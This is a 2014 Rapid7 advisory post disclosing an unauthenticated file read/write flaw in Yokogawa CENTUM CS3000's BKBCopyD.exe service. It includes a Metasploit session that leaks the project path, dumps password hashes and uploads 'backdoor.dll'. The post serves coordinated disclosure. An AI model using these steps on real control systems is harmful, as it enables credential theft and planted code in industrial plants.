todb

R7-2014-10 Disclosure: Yokogawa CENTUM CS3000 BKBCopyD.exe File System Access

Blog Post created by todb Employee on Aug 9, 2014

This blog post represents the final disclosure of the the Yokogawa CENTUM CS3000 vulnerability discussed by Tod Beardsley (@todb) and Jim Denaro (@cipherlaw) on their DEFCON talk, "How To Disclose an Exploit Without Getting in Trouble". A link to that talk, and the slides, will be available shortly.


Let's start with a quote from the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."

 

Vulnerability Summary

 

The Yokogawa Centum CS3000 solution uses different services in order to provide all its functionality. The “BKBCopyD.exe” service, started when running the “FCS / Test Function”, listens by default on TCP/20111. There is a lack of authentication which makes possible to abuse several operations provided by the service in order to:

 

  • Leak the CENTUM project database location.
  • Read arbitrary files.
  • Write arbitrary files.

 

Reading and Writing to the file system will happen with the privileges of the CENTUM user.

 

Disclosure Timeline

 

DateDescription
March, 2014Client-Attorney Relationship Established between Cipherlaw Group and Rapid7
April 14, 2014Vulnerability details disclosed to attorney
May 1, 2014Details offered to vendor
June 25, 2014Details disclosed to CERTs
Aug 9, 2014Details, Metasploit module published as PR 3637

 

Technical Analysis

 

The “BKBCopyD.exe” service provides several operations, which can be abused without further authentication by anyone with network access to the service. The operations are described below:

 

  • PMODE: this command allows getting the value for environment variables. It includes the MR_DBPATH variable with the project path in the file system or network resource.
  • RETR: this command allows reading arbitrary files from the remote file system with the privileges of the CENTUM user. The service neither the command provide any additional authentication or authorization mechanism.
  • STOR: this command allows storing arbitrary files in the remote file system with the privileges of the CENTUM user. The service neither the command provide any additional authentication or authorization mechanism.

 

Exploitation

 

A working Metasploit module has been developed for Windows XP SP3 / Yokogawa Centum CS3000 R3.08.50, where is possible to leak the database location, retrieve and store arbitrary files:

 

  • Retrieving the database location with PMODE:

 

msf > use auxiliary/admin/scada/yokogawa_bkbcopyd_client

msf auxiliary(yokogawa_bkbcopyd_client) > set RHOST 172.17.1.63

RHOST => 172.17.1.63

msf auxiliary(yokogawa_bkbcopyd_client) > set action PMODE

action => PMODE

msf auxiliary(yokogawa_bkbcopyd_client) > run

 

 

[*] 172.17.1.63: 20111 - Sending PMODE packet...

[+] Success: 210 PMODE C:\CS3000\ENG\BKPROJECT\MYPJT\TestMaster\HIS0163\database command successful

 

  • Retrieving the project password database location with RETR:

 

msf auxiliary(yokogawa_bkbcopyd_client) > set action RETR

action => RETR

msf auxiliary(yokogawa_bkbcopyd_client) > set RPATH C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/Password.odc

RPATH => C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/Password.odc

msf auxiliary(yokogawa_bkbcopyd_client) > run

 

 

[*] 172.17.1.63: 20111 - Sending RETR packet...

[*] Server started.

[*] 172.17.1.63 - Getting data...

[+] /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin saved!

[*] 172.17.1.63 - Getting data...

[*] Server stopped.

[*] Auxiliary module execution completed

msf auxiliary(yokogawa_bkbcopyd_client) > cat /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin

[*] exec: cat /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin

 

 

#YDCS_PASSWORD PROJECT: MYPJT

OFFUSER:01a742f640f8a4c0b57feb7ae6e29099:1391182083

ONUSER:aad21bd26dae81dce52741595bea7beb:1391182083

ENGUSER:2550cc2337fcd119327b8d730476cfdc:1391182083

PROG:b08f11a7e028f607009ba4039d9bda0e:1391182083

TESTUSER:2dc22e16cbfae90fafd1a5d84e09b48f:1391182083

#!2712db741f4af7718f74fd179deacbe3msf

 

  • Placing remote files with STOR:

msf auxiliary(yokogawa_bkbcopyd_client) > set action STOR

action => STOR

msf auxiliary(yokogawa_bkbcopyd_client) > set LPATH /tmp/backdoor.dll

LPATH => /tmp/backdoor.dll

msf auxiliary(yokogawa_bkbcopyd_client) > set RPATH C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/backdoor.dll

RPATH => C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/backdoor.dll

msf auxiliary(yokogawa_bkbcopyd_client) > run

 

 

[*] 172.17.1.63: 20111 - Sending STOR packet...

[*] Server started.

[*] 172.17.1.63 - Sending data...

[*] Server stopped.

[*] Auxiliary module execution completed

msf auxiliary(yokogawa_bkbcopyd_client) >

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Outcomes